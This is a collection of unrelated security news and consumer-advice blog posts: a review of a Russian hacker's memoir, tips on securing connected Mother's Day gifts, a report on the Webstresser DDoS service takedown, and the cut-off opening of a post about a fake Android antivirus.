The alternating chapters of the book serve as a stark reminder of where such life choices lead, as Sergey reveals the harsh realities of life in a Russian prison.  Even these are fascinating, as the smooth-talking criminal does his best to learn the social structure of Russian prison and find a safe place for himself on the inside.  The bone-crushing beatings, deprivation of food and privacy, and the fear of never knowing which inmate or prison guard will snap next in a way that could seriously harm or kill him is a constant reminder that eventually everyone gets caught and when they do, the consequences are extreme.

Sergey's original English manuscript has been greatly improved with the help of feedback from pre-readers and some great editors. After my original read, I told Sergey "I LOVE the story delivery mechanism, and there are fascinating stories here, but there are a few areas that really need some work."  It's clear that he took feedback like this seriously.  The new book, released in May 2018, is markedly improved without taking anything away from the brilliant story-telling of a fascinating criminal career ending with a harsh encounter with criminal justice.

A purchase link to get the book from Amazon: How to Steal a Million: The Memoirs of a Russian Hacker

The book was extremely revealing to me, helping me to understand just how closely linked the various Russian criminals are to each other, as well as revealing that some brilliant minds, trained in Computer Science and Engineering, and left morally adrift in a land where corruption is a way of life and with little chance of gainful employment, will apply those brilliant minds to stealing our money.

I seriously debated whether I should support this book.  Many so-called "reformed" criminals have reached out to me in the past, asking me to help them with a new career by meeting with them, recommending their services, or helping them find a job.  It is a moral dilemma.  Do I lend assistance to a many who stole millions of dollars from thousands of Americans?  Read the book.  To me, the value of this book is that it is the story of a criminal at the top of his game, betrayed by his colleagues and getting to face the reality of ten years in a Russian prison.  I think the book has value as a warning -- "a few months or even a couple years of the high life is not worth the price you will pay when it all comes crashing down."

Links to selected blog articles that feature Pavlovich's cast of characters:

May 12, 2008 TJX and Dave and Busters - Maksym Yastremskiy (Maksik) Aleksandr Suvorov (JonnyHell) and Albert Gonzales (Segvec) and their role in the TJX Data Breach.

August 5, 2008 TJX Reminder: We Will Arrest You and We Will Send You To Jail - some of the legal aftermath of the case above.

August 8, 2008 TJX: the San Diego Indictments where the US government indicts:
  • SERGEY ALEXANDROVICH PAVLOVICH, aka Panther, aka Diplomaticos, aka PoL1Ce Dog, aka Fallen Angel, aka Panther757
  • DZMITRY VALERYEVICH BURAK, aka Leon, aka Graph, aka Wolf
  • SERGEY VALERYEVICH STORCHAK, aka Fidel
and charges them with violation of "18 USC Section 1029(b)(2) Conspiracy to Traffic Unauthorized Access Devices"

May 9, 2013 ATM Cashers in 26 Countries Steal $40M talks about BadB's role in "Unlimited" ATM cash-out schemes, and his arrest in 2010 and sentencing to 88 months in 2013.

Jan 14, 2014 Target Breach Considered in Light of Drinkman/Gonzalez Data Breach Gang talked about Albert Gonzales, Vladimir Drinkman, and how there seemed to be such a strong pattern of behavior - a script if you will - to how criminals were conducting the major data breaches of that time.

Jan 27, 2014 Roman Vega (CarderPlanet's BOA) Finally Gets His Sentence addressed the plight of Roman Vega, who had been drifting around in the American criminal justice system, unsentenced, from 2003 until 2013! Dmitry Golubov AKA Script, the "godfather of CarderPlanet" is also discussed in this post.



Keep Your Mum Safe This Mother’s Day!

On my first Mother’s Day 21 years ago, I received a pair of gorgeous fluffy pink slippers. Last year – it was a sleek shiny green Fitbit! Technology has absolutely transformed our gift giving and Mother’s Day is no exception.

The rising popularity of internet connected gifts means many lucky mums will receive a glossy new device on Mother’s Day. It may be a digital home assistant, a fitness tracker or even a big new Smart TV. Whatever it is, we must understand the potential risks involved when giving or receiving an internet enabled device. Because we don’t want to put our mums (or our families) at risk.

But don’t let this change your shopping plans! Like anything in life, if you’re prepared you can minimise the risks and avoid getting caught out by cyber threats. So, here is the low-down on threats posed by some of the more popular gifts this Mother’s Day and tips on how to protect against them.

Digital Home Assistants

Regardless of which brand you might choose, a digital assistant can be a massive help for any busy mum.  Whether it reading the kids a bedtime story or a recipe while you cook, or setting timers – it’s the closest thing many mums can get to another set of hands!

However, there are risks associated with these mother’s helpers. If your home assistant is hacked, your personal information could be at risk. Which means your  bank accounts details or your identity could be put at risk. And as the device is ‘always on’, your personal assistant can listen to and record what is being said around your house – a definite privacy issue.

What to Do to Stay Safe

  • Protecting your Home Wi-Fi is an essential step to ensuring your home assistant is secure. Solutions such as McAfee’s Secure Home Platform, available soon on D-Link routers, will secure all your devices that connect to your Home Wi-Fi, including your home assistant. So, you have protection and peace of mind.
  • Always change the manufacturer’s default password when setting up the Wi-Fi and ensure you create a complex, unique one instead. A combination of lower and upper-case letters, numbers and special characters is ideal.
  • Don’t allow your home assistant to store your private information. I also advise against allowing your home assistant to store passwords, credit card data, or any of your contact information.

Fitness Trackers

A wearable fitness tracker might be at the top of your mum’s wish list this Mother’s Day. But there are some surprisingly worrying security risks surrounding the popular gift that she should be aware of.

Researchers have found it is possible to crack PINs and passwords by hacking into the motion sensors to track hand movements. Additional research shows that the encryption offered by wearable fitness tracker manufacturers is quite easily intercepted. This means all your personal data stored on the device can easily be hacked. And while info like your calorie intake and step count many not seem valuable to a hacker, information like where you worked out and how long you were away from home can paint a very valuable picture of who you are!

What to Do to Stay Safe

  • Keep your fitness tracker up-to-date. Just like with any connected device, as soon as software updates become available, download them immediately to prevent cyber criminals from hacking your device.
  • Set up your fitness tracker and any associated online accounts with an obscure user name and unique passwords, that are completely unrelated to any of your other accounts.
  • Read the Privacy Policy of the device or app you are considering buying. Make sure you are comfortable with the company’s commitment to protecting your data.
  • Consider disabling certain features of the fitness tracker if you feel that your privacy many be jeopardised.

Smart TVs

Whilst buying mum a smart TV would certainly make her feel spoilt this Mother’s Day, they can come with a more sinister side. In March 2017, news emerged that it may be possible to hack into smart TVs to spy on users. Since then, several critical vulnerabilities have been found in Vestel firmware, which is used in more than 30 popular TV brands. These vulnerabilities could be easily leveraged to spy on smart TV users through the microphones and cameras.

What to Do to Stay Safe

  • Buy smart TVs with security in mind. When purchasing a smart TV, it’s always important to do your homework and read up on any current vulnerabilities.
  • Secure your home’s internet at the source. Smart TVs, like all connected devices, must connect to a home Wi-Fi network to run. If they’re vulnerable, they could expose your network as a whole. Since it can be challenging to lock down all the IoT devices in a home, again a solution like McAfee Secure Home Platform can provide protection at the router-level.

If you are shopping online for mum, please remember to keep your guard up. Only shop from secure websites where the URL begins with ‘https://’ and a lock icon appears in the address bar. NEVER, EVER shop using unsecured Wi-Fi. It can leave you vulnerable to all sorts of nasty attacks and your private information may be hacked by a third party.

Finally, and most importantly, don’t forget to thank your wonderful mum for everything she has done for you. A handwritten card with a few lines of thanks is extremely powerful!!

Happy Mother’s Day!!

Alex xx

 

The post Keep Your Mum Safe This Mother’s Day! appeared first on McAfee Blogs.

Webstresser.org has been seized

Police take down a major cybercrime resource

A recent global raid conducted by police in the UK, US and the Netherlands has helped to take down a major cybercrime resource called WebStresser. The WebStresser website allowed anyone with a credit card to “buy” a distributed denial of service (DDoS) attack on another website of their choice.

What are DDoS attacks?

A DDoS attack uses a network of bots to flood a target website with traffic. Each bot attempts to access the website hundreds of times each minute; eventually there are too many access attempts for the website to handle and it crashes.

It can take many hours for a website to recover from a DDoS attack. Ecommerce sites could lose thousands of dollars during that time because genuine buyers cannot make purchases.

The DDoS attack technique is reliant on thousands of bots to generate the necessary traffic to overload a website. Normally hackers need to infect thousands of computers with malware to create the bot network – a process that can take days or weeks to complete, and which could cost thousands of dollars to set up.

The WebStresser difference

But when using the WebStresser service, anyone could access a network of preconfigured bots instantly. Even more concerning for website owners was the cost of using WebStresser – DDoS attacks could be bought for as little as $15.

This low entry price meant that anyone with a grudge could attack a website – even if they had no technical skills, or experience of hacking. The police believe that thousands of websites were targeted using the WebStresser service before it was taken offline.

A temporary win

Although WebStresser has gone, it is only a matter of time before a copycat service launches. Now that cybercriminals know they can make money from running a DDoS botnet, it is only a matter of time before we see similar hack-for-cash services pop-up elsewhere.

You can play your part

Home users are very unlikely to find themselves the target of a distributed denial of service attack – but that’s not to say you will never be part of one. The WebStresser service uses a network of compromised PCs just like your own as part of the attack.

Unprotected computers are infected with malware that sits dormant until required. When the DDoS attack is launched, these infected computers are then called into action, to target a specific website. Chances are that you will never even know that your computer has become part of a zombie network until an attack begins and your computer slows down.

To avoid becoming an unwitting accomplice, you must ensure that your PC is regularly updated, and that you have a comprehensive antimalware system installed. These combination will help to prevent malware from infecting your PC.

Play your part in making the web a safer place (and stop your PC slowing down too) by downloading a free Panda Dome trial today.

The post Webstresser.org has been seized appeared first on Panda Security Mediacenter.

Mobile Menace Monday: re-emergence of a fake Android AV

Back in early 2013, a new mobile antivirus (AV) company called Armor for Android emerged into the mobile security software industry that had everyone perplexed. It seemed eerily like malware known as a Fake AV, and some even gave it that label. As a younger mobile researcher, I was one of those who gave it such a label, adding it to a list of malware detections. Shortly after, Armor for Android contacted the security company I worked for at the time and demanded their detection be removed.

As a rebuttal, I wrote a blog to fire back with evidence that there was no way this AV company could be legitimate—despite it being on Google Play. I never published that blog because I was thrown off by something that had me questioning everything: the AV company was tested by a reputa